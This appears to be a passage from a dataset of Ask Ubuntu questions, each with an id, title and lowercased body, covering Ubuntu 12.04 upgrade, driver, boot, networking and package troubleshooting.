i915_driver_load '' using so much ram ? is it related to graphics stuff that i do n't need on a server ? how do i release the ram if it 's not necessary for the server to function ?
131524	what is the need for /boot and /tmp partitions in ubuntu	what is the reason of /boot and /tmp partitions in ubuntu ?
131535	why is dash displayed permanently using screen space in the new v12	i have an acer aspire one netbook and now having just upgraded to 12.04 the dash program - that has always irritated me by keep popping up when i use spreadsheets and other documents that need the pointer to move close to the left edge of the screen causing the wretched icons from dash to pop up - is now permanently down the side of my left hand side and as a result my internet pages all need scrolling to the right to get see the 1/4 inch pinched by dash . how can i get my screen back to full view and dash at least in 'pop up ' status again . if i am stuck with this then i will reformat my hard disk and either go back to ubuntu version 9 which was much quicker starting and simpler to use or look for another linux provider .
131538	display sub-directories in video lens	i just installed a fresh copy of ubuntu 12.04 to try out . i 'm really liking the unity dash for easily opening content ( htpc in mind ) . i decided to see how it works and i dumped a folder full of video files of my favourite show into video 's in my home folder , each season separated by directories . when i went back to the unity dash , it mixed all the video 's together . i understand i could just search for the video i want , but i 'd like to have the functionality to have things organized in sub-directories and click through what i want via unity . is there a way to tell it to recognize the directory structure in unity ?
131546	how to shrink a partition without using gparted ?	unfortunately all the answers i found involve gparted . i thought i could be using parted , but apparently the `` parted resize '' command has some limitations with respect to gparted when working on a partition which has already a filesystem in it ( gives a warning and also ca n't work on filesystem with some special features like journal , etc ... ) i was being able to shrink the filesystem ( ext4 ) by using resize2fs command , but now i do n't know how to shrink the partition in order to create a new one . i also compiled parted 3.0 , but in this new version the resize command has been removed altogether ... should i just use fdisk ? in the man i do n't see a resize command there , they say to use parted ... thanks
131547	hosting my domain name in 12.04 web server	in sites-available i created a new file from the default file and changed paths . in sites-enabled i created a sym link . in hosts i added the new domain after 127.0.0.1 localhost restarted apache but my web sites does not show outside , only on my local machine what 's wrong ? fero
131548	how do i actually run flash cs5 using wine ( or virtualbox ) ?	i installed wine . never used it for anything . i already use flash on my other os ( win 7 ) but do n't know how to open it from ubuntu using wine . lots of tutorial about installing wine/virtualbox but none specifically for launching flash .
131553	ubuntu 12.04 caused dell d620 wireless to not work	i was running 11.xx with the internal b43 wireless . i have followed all the suggested install b43-fwcuttter firmware-b43-installer etc . removed blacklist.conf entry for b43 removed bcmwl-kernel-source still nothing ... . give me back ubuntu 10 ! !
131556	12.04 & 11.10 macbook pro issues . trackpad and mouse are n't working . ca n't login or boot from cd	i just updated my macbook to 12.04 lts and upon install my wi-fi was n't working or even showing up for that matter . i then downgraded to 11.10 via booting from an install disc . upon downgrading to 11.10 i had the wifi problem yet again , along with my mouse not working . ( a usb one helped me ) i then restarted the system and wifi and the mouse problems were temporarily fixed . i then installed a few sources & apple drivers via terminal . i rebooted so these could take effect and my computer now wo n't respond to mouse or even keyboard actions . even when plugging in a usb mouse or keyboard nothing works . i ca n't boot from cd holding c at startup , and ca n't get into the boot options with shift either . i also have tried control alt f1 with no luck . any feedback would be greatly appreciated . thanks !
131560	are there any security issues with guest accounts ?	i have just reactivated the guest session in ubuntu , because several people use my laptop on a temporary basis . i wanted to know if there are any security issues with using a guest session , and if this means someone could access my computer .
131562	can i make a bootable usb flash drive for mac from windows	problem : macbook hard drive crashed and is ruined . i need to work on a music assignment on a program only available for mac os x and ubuntu , and will not be able to get a new hard drive for the mac before the assignment is due . i only have non-administrator access to windows xp and 7 computers . can i make a usb drive with ubuntu on it so i can use my macbook with this ? can i create this from a windows computer ? please give detailed steps , if possible , for i am a noob when it comes to computers , and especially linux .
131570	how do you make ubuntu accept files sent over bluetooth	i have a problem when i send my files from phone to ubuntu 12.04 via bluetooth as the phone prompts with the message `` the file not sent '' ! i can send any files from ubuntu 12.04 to my android phone .
131571	multi-workspace compatible taskbar in unity 3d	i 'm currently using tint2 , which does n't seem to support workspaces in unity 3d very well . it ca n't keep windows in different workspaces in the correct taskbar ( all workspaces show left monitor 's tasks on left monitor , all workspaces show right monitor 's tasks on right monitor ) . however , it works great in unity 2d . are there any alternatives that support this without having to drop down to the 2d interface ? i ca n't seem to find anything even remotely close to it . ( i 'm hoping for something as similar to window 's taskbars as possible - not a dock ) . thanks !
131573	should n't system-settings -- > display `` see '' the monitor correctly ?	this is a 12.04 intel 32-bit system with 8gb ram and a gigabyte gt220 nvidia graphics card . the resolution displayed by system-settings -- > display is correct , but the monitor is detected as `` laptop '' , instead of `` samsung syncmaster '' , which is what nvidia x server settings find . i do not need 3d acceleration , since i do not play any games . should i get rid of the nvidia additional drivers ? could it solve the shutdown incapability problem that has been plaguing my system since the 11.10 update ?
131578	not able to do multitouch gestures ( except two finger scrolling ) on touchpad	on the site : https : //wiki.ubuntu.com/multitouch it says that unity supports 3 finger pinch to maximize/restore windows and many more gestures . i am not able to use these multi touch features . i can only use two finger scrolling and nothing else . my synclient prpperties are also right . i am using ubuntu 12.04 intel i5 sony vaio laptop my system is up to date .
131580	how do i install cyrus-sasl on 10.04 server ?	this indicates that there is a cyrus-sasl2 package , but it does n't appear to be available in the repositories ? i need to install cyrus sasl for use with postfix , not the cyrus imap server . how do i install cyrus-sasl on a 10.04 server ?
131584	what is the process to get a winxp or win7 from its original harddrive into a virtualbox vm ?	i 've got a crying student in the hallway . it is submission date for an assignment paper , and his laptop died as it fell out of his backpack doing 30mph on the way in . the solid-state-disk seems ok , so were trying to recover the files by putting it into a mobile case and copy the files . right now , i need to figure out what the process is to get a virtual machine running ( kvm or virtualbox ) using the students solid-state-disks ' winxp as his work is unfinished , and no-body here uses windows ( we are all ubuntu 's ) . any hints on what to query ( a ) , the process ( b ) or - if i 'm really lucky - a script that does most of the works in one go ( c ) ?
131591	custom grep with asterisks and anchors ?	i have lots of edi files ( which is pretty much a single line of gibberish text ) that are about 300mb/pcs . i 'm looking to pattern matching this : `*up*605284466346 { lots of other stuff inbetween with set length } qty*17` what i know is that up is at the head of every section followed by the sku at the tail end is qty with the quantity # . what i 'm trying to find is sku : 605284466346 with a qty : 17 this was my valiant attempt : find * | grep -lir 'up*605284466346 . *qty\*97 ' * | grep -v svn
131593	ubuntu 12.04 on dell inspiron n5010 laptop . i ca n't install the ati drivers !	after a clean install of ubuntu 12.04 on my dell inspiron n5010 laptop , i ca n't install the ati drivers ! how i can fix this ? because my laptop gets very hot & is too slow ! the battery runs immediately ! : ( gretts !
131594	ubuntu 12.04 upgrade - no programs in dash	i upgraded to ubuntu 12.04 after being prompted . every did as it should have ... so i think . the install took a very long time so i did not pay too much attention to the install . anyways , i just logged in to my computer today ( ubuntu 12.04 now installed ) and i have no programs to choose from . the dash home has nothing in it . i open the software center to find that it is no longer working properly either ... meaning , the window opens , but nothing works ... nothing is displayed and the search renders nothing at all . the only programs that run are the default programs in the icon bar . i have never seen such a problem with ubuntu before , or linux for that matter . i need to get this fixed asap !
131599	how to enable thumbnails for flac files in nautilus ?	somehow i managed it to get thumbnails for flac audio files , which have covers included in their tags , to show up in ubuntu version 11.10 . but since i reinstalled for ubuntu 12.04 , they do n't show up anymore and i do n't know which package i need to install to re-enable . i 've already installed `` ffmpegthumbnailer '' , `` ffmpegthumbs '' , `` kdegraphics-thumbnailers '' , `` kffmpegthumbnailer '' , `` mplayerthumbs '' packages . do i need `` tumbler '' to get it working again ? one possible reason : it may be possible that some ppas i used in 11.10 contained newer version of the thumbnailers than shipped with ubuntu 12.04 . if somebody could point me to the right package i could update it again .
131601	how to overcome signature verification error ?	i ran this command in the terminal : sudo apt-get update updating ends with the following error report : w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //extras.ubuntu.com precise release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //ppa.launchpad.net precise release : the following signatures were invalid : badsig 4c1cbc1b69b0e2f4 launchpad ppa for jonathan french w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/precise/release what does this mean and why is it happening ?
131606	file explorer not opening after upgrade to 12.04 and other issues	recently i upgraded ubuntu 11.10 to 12.04 via update manager . but i face many problems . 1 . the file explorer is not at all opening . 2 . all my files that were in desktop are missing . and could n't open file explorer . 3 . my ubuntu theme ( default ) has become fully corrupted and very ugly . please solve my problems .
131608	how to remove all samba users ?	when setting up samba for the first time , it `` read '' all the users in ad ( ubuntu is on a domain ) and added them to the samba user list . obviously that is n't what i wanted . with over 1500+ users , i would like to remove all of them and then manually add the ones that need access to the respective folders . is there an easier way to remove all samba users than highlighting them and clicking the `` delete '' button ( via the samba gui ) ?
131615	problem with12.04 install , grub rescue	i have an hp notebook with 2hard drives , /dev/hda & /dev/hdb . i have /home on hda and / on hdb . when i installed 12.04 i reformatted hdb which has the root and swap partitions and left the drive with /home untouched . now when i try to boot i get the following : error : no such device : 8796ed20-2210-4f37-aa38-9b80c883b77a . grub rescue > i have tried rescatux and followed a coupleof threads to try and effect a repair to no avail . any sggestions would be greatly appreciared
131617	how do i use the hud ?	so how do you use hud ? when i tap the headings for the menus shows up . all i had to do in the past is mouse over the top of the screen and that happens . can you tell and show me things that hud can do that makes is so great . seems to me it is less useful than windows . is this correct ?
131622	how to upgrade from 11.10 to 12.04 ?	i am using 11.10 and i really want to update to 12.04 but it 's impossible . i can not see it in the update manager ( i did select the option for the releases ) . i tried sudo update-manager d , and sudo-apt get upgrade and sudo apt-get upgrade release d but nothing . and sudo do-release-upgrade is not working as well ! ( i get `` no release found '' message . ) so finally i did put on a live usb and when i boot , i click on install , then it 's telling me that i do have 11.10 and i can select for erase all and install ubuntu 12.04 or i can install along 11.10 and the second option to update 11.10 to 12.04 is grey . i can not selected it ! why ? am i running out of options ? what else can i do to upgrade to 12.04 ?
131624	wireless was disabled ?	i downloaded version 11.04 and it does not find the drivers to install and can not even find anything on google to fix this problem . thought i was my wireless did not work on linux , but i downloaded the ubuntu version ultimate gamers , and my wireless worked normal i downloaded version 12.04 , thinking it would fix q hitch , but then nothing = / please give me a light . i can not stand to use another os , i want ubuntu ! ! !
131632	no encrypt button	i have noticed that for a while now there has been no button in nautilus to encrypt something since either 11.10 or 11.04 but now i need to encrypt something and it has n't reappeared .
131634	how do i get windows to have borders/titlebars after upgrade from 11.10 to 12.04 ?	i upgraded from 11.10 to 12.04 . upgrade seemed to have no problems , but when i open a window it has no border or title路bar . i am using gnome classic . oddly , google chrome does have minimize , full-size & close boxes . under gnome classics ( no effects ) the window title路bar is there . under gnome i get a title路bar but without minimize or maximize , only close .
131639	unmet dependencies for media players	i installed ubuntu 12.04 while it was in beta2 stage . since then i have been receiving regular as well as partial upgrade ( i do n't understand why i am provided this option though i am on the latest ubuntu release ) options . i was never able to play formats like mp4 using native 'movie player ' . every time i tried playing such formats , movie player used to search for plugins and finally used to give me this result : the following packages have unmet dependencies : gstreamer0.10-ffmpeg : depends : libavcodec-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed depends : libavformat-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed depends : libavutil-extra-51 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu10 is to be installed depends : libglib2.0-0 ( > = 2.31.2 ) but 2.32.1-0ubuntu2 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.31 ) but 0.10.36-1 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu1 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.16 ) but 1:0.4.16-1ubuntu2 is to be installed depends : libpostproc-extra-52 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed depends : libswscale-extra-2 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed gstreamer0.10-ffmpeg : i386 : depends : libavcodec-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed depends : libavformat-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed depends : libavutil-extra-51 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu10 is to be installed depends : libglib2.0-0 ( > = 2.31.2 ) but 2.32.1-0ubuntu2 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.31 ) but 0.10.36-1 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu1 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.16 ) but 1:0.4.16-1ubuntu2 is to be installed depends : libpostproc-extra-52 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed depends : libswscale-extra-2 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed today after i did a 'partial upgrade ' my vlc media player went missing . it was probably uninstalled during the partial upgrade process . since then when i try installing vlc i get this error : vlc : depends : vlc-nox ( = 2.0.1+git20120502+r198-0~r36~precise1 ) but it is not going to be installed depends : libvlccore5 ( > = 2.0.0 ) but it is not going to be installed recommends : vlc-plugin-notify ( = 2.0.1+git20120502+r198-0~r36~precise1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 2.0.1+git20120502+r198-0~r36~precise1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i use ppa : videolan/stable-daily ppa . how do i solve this issue ?
131648	can i map the media player function keys to a media player other than totem ?	i can use my function key+stop , next , previous , etc to control totem using my keyboard . can i map these settings entirely to vlc ?
131652	turning ubuntu off	in order to turn system off i have to turn the power off . when i click on my user name in upper right hand corner the system shut down menu does not appear in ubuntu 12.04 . i upgraded from 11.04 to 12.04 . if do click on my user name it asks me to log in and also asks if i want to shut down . when i click shut down nothing happens
131655	grub rescue error while uninstalling ubuntu12.04	i have xp and ubuntu . i unistall ubuntu using xp desktop by unallocating memory from memory management . after that when i reboot my laptop i got grub rescue error . so after reading some blogs i use my xp cd recovery console and tried fixmbr fixboot but this also not solve my problem . it still shows grub rescue on booting . what should i do now .
131657	ca n't access localhost	i ca n't access anything inside of localhost , whenever i try to access anything inside of localhost it gives me 403 forbidden error . i also ca n't add any files into the var/www/ folder unless i open it through sudo ; nonetheless , when i access localhost itself the default html appears which says it works . what could be causing this to happen ? thanks .
131660	problem with application lens	i have recently upgraded to 12.04 and the application lens is intermittently appearing in the dash . when it does n't appear any programs do n't appear when searching for them . however the icon for the application lens still appears . i have tried reinstalling it to no effect . it only reappears when you run unity -- reset . as you can see the application lens icon appears , but does n't appear in the list . how can i fix this ?
131661	`` 99 99 '' permissions on mac os x shared drive	i have mac os x lion and ubuntu 12.04 installed on two separate ssds with the my mac os x data on a hdd . i disabled journaling on the data drive , installed the necessary drivers , and modified the fstab -- now the data drive mounts in ubuntu with read/write access . further , i 've modified my ubuntu user 's uid ( 502 ) and gid ( 20 ) to match that of the mac user . however , i noticed that while some files have the correct permissions in ubuntu ( user : dialout ) , others are set as 99:99 . i can change these to user : dialout from ubuntu , but any time i create a new file or folder in mac os x , the permission is 99:99 in ubuntu . is there a way around this without changing permissions every time i want to modify a file from ubuntu ?
131667	can i use juju for a single server or do i need to work in a cloud	can i use juju on a single home server using ubuntu server 12.04 or do i have to be in a cloud environment to work with it ?
131668	script for checking for installed applications	i 'm trying to write a script for ubuntu 10.0.4 to check for an application on my system . i want the script to see if the particular named application is installed , and if it is , if it needs updating . i also want the script to automatically install the app if it is n't installed , or update the application if it is installed . like if i needed to install wine or gimp . i 'm not sure how to structure the commands but i know i will use either apt-get , or yum to find the application .
131671	broadcom wireless not working after upgrade to ubuntu 12.04	i 've upgraded to ubuntu 12.04 and my wireless is n't working anymore . here is some information about the system : $ cat /etc/modprobe.d/* | grep bcm # warning : this file is autogenerated by bcmwl . all changes to this file will be lost . blacklist bcm43xx blacklist bcma # blacklist bcm43xx blacklist bcm43xx $ sudo gedit blacklist.conf [ sudo ] password for alexandre : $ rfkill list all 0 : acer-wireless : wireless lan soft blocked : yes hard blocked : no $ rfkill unblock 0 $ rfkill list all 0 : acer-wireless : wireless lan soft blocked : no hard blocked : no $ lspci -nn | grep 0280 06:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 ) computer acer aspire 5315 . any ideas on how i can solve this ?
131684	how to boot with bluetooth turned off	i do n't want to turn off the bluetooth device every time i boot , to save energy and for safety . i want it on on certain occasions during a short time only . so i rather turn it on ( it takes 4 seconds ) before using it . that should be the natural default configuration . what is going on ?
131688	unable to locate package libx11-dev	i was trying to build htk using ubuntu 11.04 . these are the commands i used : sudo ./configure make all i immediately get the error : x11/xlib.h : no such file or directory so when i try to install libx11-dev by using : sudo apt-get install libx11-dev i got the following error : unable to locate package libx11-dev i 'd appreciate some help on this .
131690	how to install ubuntu 12.04 on an hp netbook with ubuntu-based mi operating system	i am attempting to install 12.04 on my hp mini netbook which runs their mi ( mobile internet ) operating system , based on ubuntu 8.04 . i 've downloaded 12.04 , inserted a usb stick , and am looking for the startup disk creator but can find no such program . what should i do now ?
131691	will i be able to load my sticky notes or i will have to type them again ?	i have many notes in my system . but i see that sticky-notes has disappeared in ubuntu12.04 . so what should be done ?
131693	i accidently removed /usr . is there a way to recover it ?	i accidently removed my entire /usr directory thanks to rvm . i can still use the terminal prompt with ctrl+alt+f6 , but i do n't have any sudo ( i guess it 's because of the missing /usr ) . is there any way to recover my files ? , i did n't reboot yet . if not how can i make sudo and the other things work again without completly reinstalling the os ? i 'm runnig ubuntu 12.04 .
131694	can not resize windows at lower right corner ?	i 'm running 12.04 inside vmware workstation . what is wrong with my installation so that i can not resize the window at the lower right corner ? the lower left does work , albeit it 's really hard to get it ; upper left/right works ok , see this video : http : //www.youtube.com/watch ? v=mmnitb0bn-8 just to make it clear : this is not restricted to terminal , same with firefox , synaptic , etc .
131695	firefox 's `` open folder '' opens gwenview	upgrading to 12.04 caused some problems to my firefox . it seems like that firefox does n't know how to handle downloads . after some researches , i 've found this solution : kubuntu 12.04 firefox and rekong do n't know how to open downloaded files but it still does n't work as it should , in fact it opens my mp3 with audacity and not with the default player . but the worst thing is that `` open folder '' opens gwenview instead of dolphin ! suggestions ?
131701	ca n't install or try live cds 's of ubuntu and kubuntu	i see the following messages from both primary and alternate ubuntu and kubuntu live cds . error : `` prefix '' is not set . then , booting a command list you need to load a kernel first both these messages are displayed very early in the boot process , the first just after the boot begins and the second immediately after i select from the `` try or install '' menu . selecting any option from `` try or install '' leaves the system locked that needs a hard reboot . i always see this on live cd 's of ubuntu/kubuntu 12.04 . but never on a live usb .
131704	i 'm so confused about full disk encryption . help : (	i 've been running a live cd of ubuntu 12.04 for more than a few days now , reading and reading , but i 'm not really understanding things when it comes to setting up fde on ubuntu 12.04 precise . i 'm sure for the majority of ubuntu users , it must be quite a simple task . full disk encryption sounds like a really smart thing to do for security reasons and all . i 'd eventually like to do something like this : http : //www.death-zone.org/luks/lukstool though i am not sure if it is possible with ubuntu . but my aim is to first get the basics down and then attempt to do the more advanced stuff . have a look at this : http : //www.death-zone.org/index.php ? option=content & task=category & sectionid=2 & id=42 & itemid=76 it 's the blog entry that explains the process behind the linked script above .
131713	how to remove sub-folders from ubuntu one or only sync the parent folder ?	i have been syncing several sub-folders of a single folder one by one so as to be able not to sync all sub-folders on all devices . now i want to sync only the parent folder . it seems to me that there is no way to do that automatically , right ? but , is there a way to remove all the sub-folders from the server , so i can add the parent folder ?
131718	nautilus file names	upgraded to 12.04 with gnome 3 , how do i get the file names to be shown under or beside folders and files . i have configuration editor but i just ca n't find it ! i must have done this in 11.10 but i 'm getting old . please treat me as a novice .
131719	instant sound notification on new mail ?	i 'm currently helping a food shop with replacing their overbloated windows installation by ubuntu . this went pretty well and the owner is quite happy , but there is still one issue : on windows , he would use live messenger and get instant notifications on new emails . this feature is pretty important since the mails are received from the online shop and needs to be processed immediately . since the personnel are not looking at the screen all of the time , an audio signal is mandatory . what software and/ or configuration is recommended to get this kind of notification ? the default im software is empathy , but it does not seems to have a mail notification feature at all . the mail-notification package can only periodically poll for new mail , but i think that the hotmail servers restrict the number of logins so this is not a real option either . finally , i saw pidgin as recommendation ( i have n't tried the mail notification feature ) , but perhaps there are better alternatives ? pidgin is actually an im client , which is not really needed in this case .
131720	help : ubuntu installation not working ... kernel panic	i just tried to download and install ubuntu on my hp pavilion desktop , i installed it on a separate 72gb partition on my hard drive with the hopes of running it alongside windows xp professional . i used the ubuntu windows installer and now whenever i reboot the machine and choose ubuntu i get a message saying kernel panic , i 'm sorry i did n't write down the specifics but i will try to restart , write everything down , and reply with all the pertinent info . any help will greatly be appreciated . m hello barry , thank you for your quick response . let me try to clarify . my computer has a 250gb hard drive with 2 partitions , one of the partitions , the d : drive has 72gb of free space on it.i used the following installer , not the live-dvd , to install ubuntu 12.04 lts . http : //www.ubuntu.com/download/help/install-ubuntu-with-windows the installer had a drop down menu that allowed me to select the 72 gb partition . once the installer went through its motions , it indicated that the system would need to be rebooted in order for the installation to be complete . i rebooted it , chose ubuntu instead of windows xp and got the following kernel panic message ... [ 6.005387 ] kernel panic - not syncing : vfs : unable to mount ... then there are about a dozen more lines of text after that , i would try to post a picture of the screen but i do n't know how to ... sorry for the late reply john , i just saw your comments . to answer your question , yes i tried installing ubuntu on a hard drive that i also have windows on , the main partition , the c : drive is the one that windows is actually installed on , and the secondary partition , the d : drive ( the 72gb partition ) is the one i tried installing ubuntu on . the d ; drive actually had a few random files like music and pictures on it when i tried installing ubuntu to it . i am now reformatting that drive so that it is completely empty , once it 's been formatted i will try to reinstall ubuntu . i am not sure what wubi is ... is that something i need to run as well ? i apologize for being such a noob to all of this . i 'm so excited to finally try ubuntu : ) update @ john : i tried to upload a screenshot of the kernel panic message but this message system is n't allowing me to post an image because i have n't earned at least 10 reputation points yet . i 'm sorry , i just figured out that yes i did indeed use wubi in another partition that windows is not in . is that my problem ? do i need to reinstall ubuntu via wubi in the main partion of my hard drive where windows actually lives ? @ john , do you by chance know if i can just create a bootable usb flash drive to install a fresh copy of ubuntu on to my empty 72gb partition ? i want to be able to dual boot .
131722	mysql server stopped working after upgrade	i upgraded to 12.04 and my mysql server just stopped working . it throws : error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) i tried to reinstall it from software center , but it fails with : package operation failed the installation or removal of a software package failed . installarchives ( ) failed : selecting previously unselected package mysql-server . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 243412 files and directories currently installed . ) unpacking mysql-server ( from ... /mysql-server_5.5.22-0ubuntu1_all.deb ) ... setting up mysql-server-5.5 ( 5.5.22-0ubuntu1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : mysql-server-5.5 mysql-server error in function : setting up mysql-server-5.5 ( 5.5.22-0ubuntu1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured i also tried : $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : mysql-server-5.5 mysql-server-core-5.5 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up mysql-server-5.5 ( 5.5.22-0ubuntu1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : mysql-server-5.5 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any idea ? edit : crash report is being auto generated . edit : after trying and trying i got suggestion to do : # apt-get -- purge remove mysql-server-5.1 mysql-server-5.5 reading package lists ... done building dependency tree reading state information ... done virtual packages like 'mysql-server-5.1 ' ca n't be removed the following packages will be removed : mysql-server-5.5* 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 31.3 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 243407 files and directories currently installed . ) removing mysql-server-5.5 ... purging configuration files for mysql-server-5.5 ... processing triggers for ureadahead ... processing triggers for man-db ... the most important part is : virtual packages like 'mysql-server-5.1 ' ca n't be removed any idea ?
131723	intel corporation centrino ultimate-n 6300 not working with 12.04	here is the information i was able to gather , if you need more just ask : uname -r 3.2.0-24-generic lspci intel corporation centrino ultimate-n 6300 ( revision 35 ) cat /etc/network/intefaces auto lo iface lo inet loopback sudo ifup wlan0 ignoring unknown interface wlan0=wlan0 . my laptop is a sager ( clevo b5100m )
131731	12.04 boots to black screen on dell insipron mini after upgrade from 11.10	here is perhaps more specific information on a subject several others have posted about , in hope that someone will be able to provide a suggestion to correct it . i 'm working with a dell inspiron mini 10 netbook . i performed a fresh install of ubuntu 11.04 , installed all applicable drivers & updates , then performed a release upgrade to v11.10 . ubuntu booted up correctly with unity working . after checking for any new drivers and applying updates , i then performed a release upgrade to v12.04 . upon restart , the screen initially turned the customary purple , then went black , followed shortly by the start up drum sound . by pressing the ctrl+alt+f2 combination , i was able to log onto the netbook . pressing alt+f7 allowed me to see what normally appears in the lower half of the screen sitting in the upper half , with the lower half still black . i entered my password again and then clicked the gear at the top right corner of the screen & selected `` logout '' , which caused the netbook to display a full login screen , allowing me to change my session to unity 2d and log onto the netbook successfully . the netbook does not remember the last session used however , and so the above procedure must be repeated after every restart or when powering up . i have modified the grub file to include nomodeset acpi=off , but it does n't seem to make any difference .
131733	grep for contents between two markers with newlines	just curious if there 's a way i can show the output between two markers ? i was trying grep -r `` < cron_expr > . * < /run > '' * but it does n't seem to be returning as expected . which is to say its not showing newline breaks ? so i guess the the real question is how can i find out what between two markers regardless of newline bs . i ca n't install on this system so no pcregrep = ( maybe awk ? ( p.s . someone should make an awk tag ) < crontab > < jobs > < enterprise_reward_balance_warning_notification > < schedule > < cron_expr > 1 * * * * < /cron_expr > < /schedule > < run > < model > enterprise_reward/observer : :scheduledbalanceexpirenotification < /model > < /run > < /enterprise_reward_balance_warning_notification > < enterprise_reward_expire_points > < schedule > < cron_expr > 1 * * * * < /cron_expr > < /schedule > < run > < model > enterprise_reward/observer : :scheduledpointsexpiration < /model > < /run > < /enterprise_reward_expire_points > < /jobs > < /crontab > i just want to show whats on the < schedule > and < run > line ( s if more than one , like above ) anytime i see and what file they 're in .
131736	installing ubuntu 12.04 on imac 21.5 using wireless keyboard !	good evening everyone . i am planning to dual boot ubuntu and mac os on my imac however i faced an issue . mostly everyone seggest to use wired keyboard while installing ubuntu on mac however i do n't have an opportunity and ability to borrow or buy new one , so is there any chance for me to install ubuntu using wireless apple keyboard ? thanks in advance p.s . i have a wired mouse p.s . i am able to connect my apple keyboard in livecd by clicking bluetooth icon and connecting it . however it does n't work ( keyboard ) until that . ( which means i can not choose anything at cd start menu until connect it )
131738	how to show arabic properly in pdf files ?	i have some pdf files in arabic , they work fine on windows . however not on ubuntu 12.04 . in system settings â¸ language support i did install arabic . i also tried other pdf programs but i just get messed up letters .
131748	normalising volume on sound files	i have a bunch of mp3s that are awfully quiet . even on max volume on my player , they 're hardly intelligible . on the other hand , i have a few mp3 's with perfect volume all over , could be used as a reference . a coworker mentioned there is a way to `` normalise '' volume on sound files , but could n't help me on how exactly it 's done . anyone know how to do this on ubuntu ?
131754	hp laserjet p1505 does n't work after update to ubuntu 12.04	my hp laserjet p1505 does n't work after update to ubuntu 12.04 from 11.10 . it 's visible to applications and they see when printer is turned on and when does n't . but when i 'm printing any document i 'm getting `` printer error '' : `` connecting-to-device '' pop-up message and then `` printing complete '' message . in /var/log/syslog i have the following ( please edit message if it goes against the rule to attach so long logs ) : may 5 00:45:39 dmitriy-desktop hp-mkuri : io/hpmud/model.c 625 : unable to find [ s { product } ] support-type in /usr/share/hplip/data/models/models.dat may 5 00:45:41 dmitriy-desktop /usr/sbin/hpljp1505 : foo2zjs : missing hp laserjet p1505 firmware file /lib/firmware/hp/sihpp1505.dl may 5 00:45:41 dmitriy-desktop /usr/sbin/hpljp1505 : foo2zjs : ... read foo2zjs installation instructions and run ./getweb p1505 may 5 00:45:42 dmitriy-desktop udev-configure-printer : add /devices/pci0000:00/0000:00:1d.7/usb2/2-2/2-2:1.0 may 5 00:45:42 dmitriy-desktop udev-configure-printer : device devpath is /devices/pci0000:00/0000:00:1d.7/usb2/2-2 may 5 00:45:42 dmitriy-desktop udev-configure-printer : device vendor/product is 03f0:3f17 may 5 00:45:42 dmitriy-desktop udev-configure-printer : mfg : hewlett-packard mdl : hp laserjet p1505 sern : - serial : ca4118w may 5 00:45:42 dmitriy-desktop kernel : [ 14955.846817 ] usblp0 : usb bidirectional printer dev 6 if 0 alt 0 proto 2 vid 0x03f0 pid 0x3f17 may 5 00:45:42 dmitriy-desktop kernel : [ 14955.846971 ] usbcore : registered new interface driver usblp may 5 00:45:42 